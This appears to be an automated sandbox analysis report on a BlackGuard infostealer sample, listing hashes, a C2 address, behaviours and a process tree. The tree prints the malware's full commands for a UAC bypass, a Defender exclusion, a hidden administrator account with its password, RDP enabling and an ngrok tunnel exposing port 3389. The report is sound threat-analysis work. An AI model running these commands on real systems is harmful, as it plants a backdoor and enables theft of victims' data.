Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20230621-en locale:en-us os:windows10-2004-x64 system -
submitted
01-07-2023 07:01
Static task
static1
Behavioral task
behavioral1
Sample
Build1exe.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
Build1exe.exe
Resource
win10v2004-20230621-en
General
-
Target
Build1exe.exe
-
Size
115KB
-
MD5
bfaa027a645e567824a10a26fb8dbefd
-
SHA1
4ab52a0b1cc105a5462c2255ef84be9af431b82e
-
SHA256
c67b6f45d0beb461838f87ca2ad4774b52d7ccf9b0fa36652e8642dc72f43302
-
SHA512
2f7ab0e4451cfeec017ba294cfcbc6f02d85c756bebce1cf9b3c69f6c77386fe9a21897734c44f4aa32dcaf3a1b7fbaaf0c4639edab1c8961761767a656b4569
-
SSDEEP
1536:ztCbuEYE+9z2wpuFavGmhMnDIhzZtz20tnh/:5CbuAsEFNmhMnDIhNI0tnh/
Malware Config
Extracted
blackguard
http://94.142.138.111
Signatures
-
BlackGuard
Infostealer first seen in late 2021.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 2584 netsh.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" vhttd.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 576 attrib.exe -
Allows Network login with blank passwords 1 TTPs 1 IoCs
Allows local user accounts with blank passwords to access device from the network.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0" dtsmsys.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation Build1exe.exe Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation dtsmsys.exe -
Executes dropped EXE 4 IoCs
pid Process 4656 dtsmsys.exe 3860 ngrok.exe 2076 ngrok.exe 3188 vhttd.exe -
Loads dropped DLL 1 IoCs
pid Process 3620 svchost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000a00000002322b-291.dat upx behavioral2/files/0x000a00000002322b-292.dat upx behavioral2/memory/3188-293-0x0000000000400000-0x0000000000592000-memory.dmp upx behavioral2/files/0x0007000000023275-297.dat upx behavioral2/files/0x0007000000023275-298.dat upx behavioral2/memory/3620-300-0x00007FFEA27E0000-0x00007FFEA2806000-memory.dmp upx behavioral2/memory/3188-301-0x0000000000400000-0x0000000000592000-memory.dmp upx -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 dtsmsys.exe Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 dtsmsys.exe Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 dtsmsys.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\flWyfUU = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\dtsmsys.exe\"" dtsmsys.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 31 ip-api.com -
Modifies WinLogon 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" vhttd.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\rfxvmt.dll vhttd.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\RDP Wrapper\rdpwrap.ini vhttd.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll vhttd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 62 Go-http-client/1.1 -
Modifies registry class 14 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute dtsmsys.exe
Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell dtsmsys.exe
Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open dtsmsys.exe
Key deleted \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell dtsmsys.exe
Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings dtsmsys.exe
Key deleted \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open dtsmsys.exe
Key deleted \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings dtsmsys.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open\command\ = "powershell -window hidden -command C:\\Users\\Admin\\AppData\\Local\\Temp\\/Snup.bat" dtsmsys.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open\command\ = "powershell -window hidden -command C:\\Users\\Admin\\AppData\\Local\\Temp\\/ngrok.exe tcp 3389" dtsmsys.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open\command\ = "powershell.exe -command Add-MpPreference -ExclusionPath C:\\" dtsmsys.exe
Key deleted \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open\command dtsmsys.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open\command\ = "powershell -window hidden -command C:\\Users\\Admin\\AppData\\Local\\Temp\\/vhttd.exe -i" dtsmsys.exe
Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open\command dtsmsys.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open\command\ = "powershell -window hidden -command C:\\Users\\Admin\\AppData\\Local\\Temp\\/ngrok.exe config add-authtoken 2NyX6XCTEbUWXHKRvIrQm5uLmlE_89gv98vabRAC8AQ1jM6gV" dtsmsys.exe
-
Modifies system certificate store
The certificate written under thumbprint CABD2A79A1076A31F21D253635CB039D4329A5E8 is the public ISRG Root X1 (Let's Encrypt) root, installed by ngrok.exe; the raw certificate blob is not reproduced.
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 ngrok.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob ngrok.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 4656 dtsmsys.exe 4656 dtsmsys.exe 3704 PowerShell.exe 3704 PowerShell.exe 4656 dtsmsys.exe 4788 PowerShell.exe 4788 PowerShell.exe 1748 PowerShell.exe 1748 PowerShell.exe 4896 PowerShell.exe 4896 PowerShell.exe 1716 PowerShell.exe 1716 PowerShell.exe 3620 svchost.exe 3620 svchost.exe 3620 svchost.exe 3620 svchost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 680 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1500 Build1exe.exe Token: SeDebugPrivilege 4656 dtsmsys.exe Token: SeDebugPrivilege 3704 PowerShell.exe Token: SeDebugPrivilege 4788 PowerShell.exe Token: SeIncreaseQuotaPrivilege 2400 WMIC.exe Token: SeSecurityPrivilege 2400 WMIC.exe Token: SeTakeOwnershipPrivilege 2400 WMIC.exe Token: SeLoadDriverPrivilege 2400 WMIC.exe Token: SeSystemProfilePrivilege 2400 WMIC.exe Token: SeSystemtimePrivilege 2400 WMIC.exe Token: SeProfSingleProcessPrivilege 2400 WMIC.exe Token: SeIncBasePriorityPrivilege 2400 WMIC.exe Token: SeCreatePagefilePrivilege 2400 WMIC.exe Token: SeBackupPrivilege 2400 WMIC.exe Token: SeRestorePrivilege 2400 WMIC.exe Token: SeShutdownPrivilege 2400 WMIC.exe Token: SeDebugPrivilege 2400 WMIC.exe Token: SeSystemEnvironmentPrivilege 2400 WMIC.exe Token: SeRemoteShutdownPrivilege 2400 WMIC.exe Token: SeUndockPrivilege 2400 WMIC.exe Token: SeManageVolumePrivilege 2400 WMIC.exe Token: 33 2400 WMIC.exe Token: 34 2400 WMIC.exe Token: 35 2400 WMIC.exe Token: 36 2400 WMIC.exe Token: SeIncreaseQuotaPrivilege 2400 WMIC.exe Token: SeSecurityPrivilege 2400 WMIC.exe Token: SeTakeOwnershipPrivilege 2400 WMIC.exe Token: SeLoadDriverPrivilege 2400 WMIC.exe Token: SeSystemProfilePrivilege 2400 WMIC.exe Token: SeSystemtimePrivilege 2400 WMIC.exe Token: SeProfSingleProcessPrivilege 2400 WMIC.exe Token: SeIncBasePriorityPrivilege 2400 WMIC.exe Token: SeCreatePagefilePrivilege 2400 WMIC.exe Token: SeBackupPrivilege 2400 WMIC.exe Token: SeRestorePrivilege 2400 WMIC.exe Token: SeShutdownPrivilege 2400 WMIC.exe Token: SeDebugPrivilege 2400 WMIC.exe Token: SeSystemEnvironmentPrivilege 2400 WMIC.exe Token: SeRemoteShutdownPrivilege 2400 WMIC.exe Token: SeUndockPrivilege 2400 WMIC.exe Token: SeManageVolumePrivilege 2400 WMIC.exe Token: 33 2400 WMIC.exe Token: 34 2400 WMIC.exe Token: 35 2400 WMIC.exe Token: 36 2400 WMIC.exe Token: SeIncreaseQuotaPrivilege 1008 WMIC.exe Token: SeSecurityPrivilege 1008 WMIC.exe Token: 
SeTakeOwnershipPrivilege 1008 WMIC.exe Token: SeLoadDriverPrivilege 1008 WMIC.exe Token: SeSystemProfilePrivilege 1008 WMIC.exe Token: SeSystemtimePrivilege 1008 WMIC.exe Token: SeProfSingleProcessPrivilege 1008 WMIC.exe Token: SeIncBasePriorityPrivilege 1008 WMIC.exe Token: SeCreatePagefilePrivilege 1008 WMIC.exe Token: SeBackupPrivilege 1008 WMIC.exe Token: SeRestorePrivilege 1008 WMIC.exe Token: SeShutdownPrivilege 1008 WMIC.exe Token: SeDebugPrivilege 1008 WMIC.exe Token: SeSystemEnvironmentPrivilege 1008 WMIC.exe Token: SeRemoteShutdownPrivilege 1008 WMIC.exe Token: SeUndockPrivilege 1008 WMIC.exe Token: SeManageVolumePrivilege 1008 WMIC.exe Token: 33 1008 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1500 wrote to memory of 4656 1500 Build1exe.exe 92 PID 1500 wrote to memory of 4656 1500 Build1exe.exe 92 PID 4656 wrote to memory of 64 4656 dtsmsys.exe 93 PID 4656 wrote to memory of 64 4656 dtsmsys.exe 93 PID 64 wrote to memory of 3704 64 fodhelper.exe 95 PID 64 wrote to memory of 3704 64 fodhelper.exe 95 PID 4656 wrote to memory of 4396 4656 dtsmsys.exe 97 PID 4656 wrote to memory of 4396 4656 dtsmsys.exe 97 PID 4396 wrote to memory of 4788 4396 fodhelper.exe 99 PID 4396 wrote to memory of 4788 4396 fodhelper.exe 99 PID 4788 wrote to memory of 1216 4788 PowerShell.exe 101 PID 4788 wrote to memory of 1216 4788 PowerShell.exe 101 PID 1216 wrote to memory of 2004 1216 cmd.exe 102 PID 1216 wrote to memory of 2004 1216 cmd.exe 102 PID 2004 wrote to memory of 2400 2004 cmd.exe 103 PID 2004 wrote to memory of 2400 2004 cmd.exe 103 PID 2004 wrote to memory of 2688 2004 cmd.exe 104 PID 2004 wrote to memory of 2688 2004 cmd.exe 104 PID 1216 wrote to memory of 4664 1216 cmd.exe 106 PID 1216 wrote to memory of 4664 1216 cmd.exe 106 PID 4664 wrote to memory of 3484 4664 net.exe 107 PID 4664 wrote to memory of 3484 4664 net.exe 107 PID 1216 wrote to memory of 4076 1216 cmd.exe 108 PID 1216 wrote to memory of 4076 1216 cmd.exe 108 PID 4076 wrote to memory of 4620 4076 net.exe 109 PID 4076 wrote to memory of 4620 4076 net.exe 109 PID 1216 wrote to memory of 1468 1216 cmd.exe 110 PID 1216 wrote to memory of 1468 1216 cmd.exe 110 PID 1468 wrote to memory of 1008 1468 cmd.exe 112 PID 1468 wrote to memory of 1008 1468 cmd.exe 112 PID 1468 wrote to memory of 4128 1468 cmd.exe 111 PID 1468 wrote to memory of 4128 1468 cmd.exe 111 PID 1216 wrote to memory of 2756 1216 cmd.exe 113 PID 1216 wrote to memory of 2756 1216 cmd.exe 113 PID 2756 wrote to memory of 648 2756 net.exe 114 PID 2756 wrote to memory of 648 2756 net.exe 114 PID 1216 wrote to memory of 4208 1216 cmd.exe 115 PID 1216 wrote to memory of 4208 1216 cmd.exe 115 PID 4208 wrote to 
memory of 2080 4208 net.exe 116 PID 4208 wrote to memory of 2080 4208 net.exe 116 PID 1216 wrote to memory of 4388 1216 cmd.exe 117 PID 1216 wrote to memory of 4388 1216 cmd.exe 117 PID 1216 wrote to memory of 2044 1216 cmd.exe 118 PID 1216 wrote to memory of 2044 1216 cmd.exe 118 PID 1216 wrote to memory of 1452 1216 cmd.exe 119 PID 1216 wrote to memory of 1452 1216 cmd.exe 119 PID 1216 wrote to memory of 5060 1216 cmd.exe 120 PID 1216 wrote to memory of 5060 1216 cmd.exe 120 PID 1216 wrote to memory of 4272 1216 cmd.exe 121 PID 1216 wrote to memory of 4272 1216 cmd.exe 121 PID 1216 wrote to memory of 4336 1216 cmd.exe 122 PID 1216 wrote to memory of 4336 1216 cmd.exe 122 PID 1216 wrote to memory of 576 1216 cmd.exe 123 PID 1216 wrote to memory of 576 1216 cmd.exe 123 PID 4656 wrote to memory of 5100 4656 dtsmsys.exe 124 PID 4656 wrote to memory of 5100 4656 dtsmsys.exe 124 PID 5100 wrote to memory of 1748 5100 fodhelper.exe 125 PID 5100 wrote to memory of 1748 5100 fodhelper.exe 125 PID 1748 wrote to memory of 3860 1748 PowerShell.exe 127 PID 1748 wrote to memory of 3860 1748 PowerShell.exe 127 PID 4656 wrote to memory of 4864 4656 dtsmsys.exe 128 PID 4656 wrote to memory of 4864 4656 dtsmsys.exe 128 PID 4864 wrote to memory of 4896 4864 fodhelper.exe 129 PID 4864 wrote to memory of 4896 4864 fodhelper.exe 129 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 576 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 dtsmsys.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 dtsmsys.exe
Processes
Indented by process depth; each entry gives the image path, PID, command line and the signatures it triggered.

[1] C:\Users\Admin\AppData\Local\Temp\Build1exe.exe (PID 1500)
    cmd: "C:\Users\Admin\AppData\Local\Temp\Build1exe.exe"
    - Checks computer location settings
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe (PID 4656)
      cmd: "C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe"
      - Allows Network login with blank passwords
      - Checks computer location settings
      - Executes dropped EXE
      - Accesses Microsoft Outlook profiles
      - Adds Run key to start application
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - outlook_office_path
      - outlook_win_path
    [3] C:\Windows\System32\fodhelper.exe (PID 64)
        cmd: "C:\Windows\System32\fodhelper.exe"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe (PID 3704)
          cmd: "PowerShell.exe" -command Add-MpPreference -ExclusionPath C:\
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\fodhelper.exe (PID 4396)
        cmd: "C:\Windows\System32\fodhelper.exe"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe (PID 4788)
          cmd: "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/Snup.bat
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\cmd.exe (PID 1216)
            cmd: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Snup.bat""
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\cmd.exe (PID 2004)
              cmd: C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\System32\Wbem\WMIC.exe (PID 2400)
                cmd: WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
                - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\system32\find.exe (PID 2688)
                cmd: Find "="
          [6] C:\Windows\system32\net.exe (PID 4664)
              cmd: net user BlackTeam JesF3301asS /add /active:"yes" /expires:"never" /passwordchg:"NO"
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\system32\net1.exe (PID 3484)
                cmd: C:\Windows\system32\net1 user BlackTeam JesF3301asS /add /active:"yes" /expires:"never" /passwordchg:"NO"
          [6] C:\Windows\system32\net.exe (PID 4076)
              cmd: net localgroup Administrators BlackTeam /add
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\system32\net1.exe (PID 4620)
                cmd: C:\Windows\system32\net1 localgroup Administrators BlackTeam /add
          [6] C:\Windows\system32\cmd.exe (PID 1468)
              cmd: C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\system32\find.exe (PID 4128)
                cmd: Find "="
            [7] C:\Windows\System32\Wbem\WMIC.exe (PID 1008)
                cmd: WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
                - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\system32\net.exe (PID 2756)
              cmd: net localgroup "Remote Desktop Users" BlackTeam /add
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\system32\net1.exe (PID 648)
                cmd: C:\Windows\system32\net1 localgroup "Remote Desktop Users" BlackTeam /add
          [6] C:\Windows\system32\net.exe (PID 4208)
              cmd: net accounts /forcelogoff:no /maxpwage:unlimited
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\system32\net1.exe (PID 2080)
                cmd: C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
          [6] C:\Windows\system32\reg.exe (PID 4388)
              cmd: reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
          [6] C:\Windows\system32\reg.exe (PID 2044)
              cmd: reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server'" /v "'fDenyTSConnections'" /t REG_DWORD /d 0x0 /f
          [6] C:\Windows\system32\reg.exe (PID 1452)
              cmd: reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxConnectionTime'" /t REG_DWORD /d 0x1 /f
          [6] C:\Windows\system32\reg.exe (PID 5060)
              cmd: reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxDisconnectionTime'" /t REG_DWORD /d 0x0 /f
          [6] C:\Windows\system32\reg.exe (PID 4272)
              cmd: reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxIdleTime'" /t REG_DWORD /d 0x0 /f
          [6] C:\Windows\system32\reg.exe (PID 4336)
              cmd: reg add "'HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'" /v BlackTeam /t REG_DWORD /d 0x0 /f
          [6] C:\Windows\system32\attrib.exe (PID 576)
              cmd: attrib C:\users\BlackTeam +r +a +s +h
              - Sets file to hidden
              - Views/modifies file attributes
    [3] C:\Windows\System32\fodhelper.exe (PID 5100)
        cmd: "C:\Windows\System32\fodhelper.exe"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe (PID 1748)
          cmd: "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/ngrok.exe config add-authtoken 2NyX6XCTEbUWXHKRvIrQm5uLmlE_89gv98vabRAC8AQ1jM6gV
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\ngrok.exe (PID 3860)
            cmd: "C:\Users\Admin\AppData\Local\Temp\ngrok.exe" config add-authtoken 2NyX6XCTEbUWXHKRvIrQm5uLmlE_89gv98vabRAC8AQ1jM6gV
            - Executes dropped EXE
    [3] C:\Windows\System32\fodhelper.exe (PID 4864)
        cmd: "C:\Windows\System32\fodhelper.exe"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe (PID 4896)
          cmd: "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/ngrok.exe tcp 3389
          - Suspicious behavior: EnumeratesProcesses
        [5] C:\Users\Admin\AppData\Local\Temp\ngrok.exe (PID 2076)
            cmd: "C:\Users\Admin\AppData\Local\Temp\ngrok.exe" tcp 3389
            - Executes dropped EXE
            - Modifies system certificate store
    [3] C:\Windows\System32\fodhelper.exe (PID 3928)
        cmd: "C:\Windows\System32\fodhelper.exe"
      [4] C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe (PID 1716)
          cmd: "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/vhttd.exe -i
          - Suspicious behavior: EnumeratesProcesses
        [5] C:\Users\Admin\AppData\Local\Temp\vhttd.exe (PID 3188)
            cmd: "C:\Users\Admin\AppData\Local\Temp\vhttd.exe" -i
            - Sets DLL path for service in the registry
            - Executes dropped EXE
            - Modifies WinLogon
            - Drops file in System32 directory
            - Drops file in Program Files directory
          [6] C:\Windows\SYSTEM32\netsh.exe (PID 2584)
              cmd: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
              - Modifies Windows Firewall
[1] C:\Windows\System32\svchost.exe (PID 2648)
    cmd: C:\Windows\System32\svchost.exe -k NetworkService -s TermService
[1] C:\Windows\System32\svchost.exe (PID 3620)
    cmd: C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v6
Downloads